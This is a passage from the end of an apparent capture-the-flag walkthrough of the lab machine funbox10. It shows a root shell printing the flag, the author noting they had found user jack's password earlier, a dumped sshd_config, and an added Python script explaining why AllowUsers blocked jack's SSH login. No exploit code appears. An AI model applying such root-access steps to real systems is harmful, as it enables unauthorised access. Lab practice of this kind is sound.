-rw-r--r-- 1 root root 74 Jul 17 2021 .selected_editor
-rw------- 1 root root 6.5K Jul 19 2021 .viminfo
-rw-r--r-- 1 root root 229 Nov 21 11:55 .wget-hsts
root@funbox10:~# cat root.txt
cat root.txt
_____ _
| ___| _ _ __ | |__ _____ ___
| |_ | | | | '_ \| '_ \ / _ \ \/ (_)
| _|| |_| | | | | |_) | (_) > < _
|_| \__,_|_| |_|_.__/ \___/_/\_(_)
_ _ _ _ _ _ _
| | | |_ __ __| | ___ _ __ ___ ___ _ __ | |_ _ __ _ _ ___| |_(_) ___ _ __ | |
| | | | '_ \ / _` |/ _ \ '__| / __/ _ \| '_ \| __| '__| | | |/ __| __| |/ _ \| '_ \ | |
| |_| | | | | (_| | __/ | | (_| (_) | | | | |_| | | |_| | (__| |_| | (_) | | | | |_|
\___/|_| |_|\__,_|\___|_| \___\___/|_| |_|\__|_| \__,_|\___|\__|_|\___/|_| |_| (_)
You did it !!!
I look forward to see this on Twitter: @0815R2d2
root@funbox10:~#
Got the root flag!!!
(Postscript: back when I had the pseudo-shell, I had in fact already found user jack and the password, but logging in as that user over SSH failed at the time, possibly because the sshd_config file restricts it and does not allow password login.
After getting root, checking the sshd_config file confirmed this, and in the pseudo-terminal it was not possible to switch users.)
root@funbox10:~# find / -name sshd_config 2>/dev/null
find / -name sshd_config 2>/dev/null
/etc/ssh/sshd_config
/usr/share/doc/openssh-client/examples/sshd_config
root@funbox10:~# cat /etc/ssh/sshd_config
cat /etc/ssh/sshd_config
# Package generated configuration file
# See the sshd_config(5) manpage for details
# What ports, IPs and protocols we listen for
Port 22
# Use these options to restrict which interfaces/protocols sshd will bind to
#ListenAddress ::
#ListenAddress 0.0.0.0
Protocol 2
# HostKeys for protocol version 2
HostKey /etc/ssh/ssh_host_rsa_key
HostKey /etc/ssh/ssh_host_dsa_key
HostKey /etc/ssh/ssh_host_ecdsa_key
HostKey /etc/ssh/ssh_host_ed25519_key
#Privilege Separation is turned on for security
UsePrivilegeSeparation yes
# Lifetime and size of ephemeral version 1 server key
KeyRegenerationInterval 3600
ServerKeyBits 1024
# Logging
SyslogFacility AUTH
LogLevel INFO
# Authentication:
LoginGraceTime 120
PermitRootLogin prohibit-password
StrictModes yes
RSAAuthentication yes
PubkeyAuthentication yes
AllowUsers joe susan
#AuthorizedKeysFile %h/.ssh/authorized_keys
# Don't read the user's ~/.rhosts and ~/.shosts files
IgnoreRhosts yes
# For this to work you will also need host keys in /etc/ssh_known_hosts
RhostsRSAAuthentication no
# similar for protocol version 2
HostbasedAuthentication no
# Uncomment if you don't trust ~/.ssh/known_hosts for RhostsRSAAuthentication
#IgnoreUserKnownHosts yes
# To enable empty passwords, change to yes (NOT RECOMMENDED)
PermitEmptyPasswords no
# Change to yes to enable challenge-response passwords (beware issues with
# some PAM modules and threads)
ChallengeResponseAuthentication no
# Change to no to disable tunnelled clear text passwords
#PasswordAuthentication yes
# Kerberos options
#KerberosAuthentication no
#KerberosGetAFSToken no
#KerberosOrLocalPasswd yes
#KerberosTicketCleanup yes
# GSSAPI options
#GSSAPIAuthentication no
#GSSAPICleanupCredentials yes
X11Forwarding yes
X11DisplayOffset 10
PrintMotd no
PrintLastLog yes
TCPKeepAlive yes
#UseLogin no
#MaxStartups 10:30:60
Banner /etc/issue.net
# Allow client to pass locale environment variables
AcceptEnv LANG LC_*
Subsystem sftp /usr/lib/openssh/sftp-server
# Set this to 'yes' to enable PAM authentication, account processing,
# and session processing. If this is enabled, PAM authentication will
# be allowed through the ChallengeResponseAuthentication and
# PasswordAuthentication. Depending on your PAM configuration,
# PAM authentication via ChallengeResponseAuthentication may bypass
# the setting of "PermitRootLogin without-password".
# If you just want the PAM account and session checks to run without
# PAM authentication, then enable this but set PasswordAuthentication
# and ChallengeResponseAuthentication to 'no'.
UsePAM yes
root@funbox10:~#
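Reading a dumped sshd_config by hand is error-prone, so as an added check (not part of the original write-up) the script below parses the directives that decide whether a password login succeeds and reports which one applies to a given user. On the directives from the file above it reports the AllowUsers line for jack, while PasswordAuthentication is only a commented-out line and therefore stays at its default. It assumes a single global section with no Match blocks, which is the case for this file.

```python
import fnmatch
import re

# Constructed sample: the directives from the sshd_config dumped above that
# decide a password login, kept exactly as on the target (comment included).
SAMPLE_SSHD_CONFIG = """\
Port 22
PermitRootLogin prohibit-password
PubkeyAuthentication yes
AllowUsers joe susan
PermitEmptyPasswords no
ChallengeResponseAuthentication no
#PasswordAuthentication yes
UsePAM yes
"""

# sshd_config(5) defaults for the directives evaluated here; a commented-out
# line is not a setting, so the default applies.
DEFAULTS = {
    "passwordauthentication": "yes",
    "permitrootlogin": "prohibit-password",
    "allowusers": [],
    "denyusers": [],
}
LIST_KEYS = {"allowusers", "denyusers"}


def parse_sshd_config(text):
    """Return the effective global directives with lowercased keys.
    The first occurrence of a keyword wins, as in sshd; parsing stops at the
    first Match block (assumption: none is present in the file being checked)."""
    cfg = dict(DEFAULTS)
    seen = set()
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = re.match(r"([A-Za-z0-9]+)\s*=?\s*(.*)$", line)
        if not m:
            continue
        key, value = m.group(1).lower(), m.group(2).strip()
        if key == "match":
            break
        if key in seen:
            continue
        seen.add(key)
        cfg[key] = value.split() if key in LIST_KEYS else value.lower()
    return cfg


def _matches(user, patterns):
    # AllowUsers/DenyUsers entries are USER or USER@HOST and may contain wildcards.
    return any(fnmatch.fnmatchcase(user, p.split("@", 1)[0]) for p in patterns)


def password_login_allowed(cfg, user):
    """Return (allowed, reason) for a password login by `user`, applying the
    checks in sshd's order: DenyUsers, AllowUsers, then the auth-method settings."""
    if _matches(user, cfg["denyusers"]):
        return False, f"{user} is listed in DenyUsers"
    if cfg["allowusers"] and not _matches(user, cfg["allowusers"]):
        return False, f"{user} is not listed in AllowUsers ({' '.join(cfg['allowusers'])})"
    if cfg["passwordauthentication"] != "yes":
        return False, "PasswordAuthentication is not 'yes'"
    if user == "root" and cfg["permitrootlogin"] in ("no", "prohibit-password", "without-password"):
        return False, f"PermitRootLogin {cfg['permitrootlogin']} blocks password login for root"
    return True, "no directive blocks a password login"


if __name__ == "__main__":
    cfg = parse_sshd_config(SAMPLE_SSHD_CONFIG)
    for user in ("jack", "joe", "root"):
        print(user, password_login_allowed(cfg, user))
```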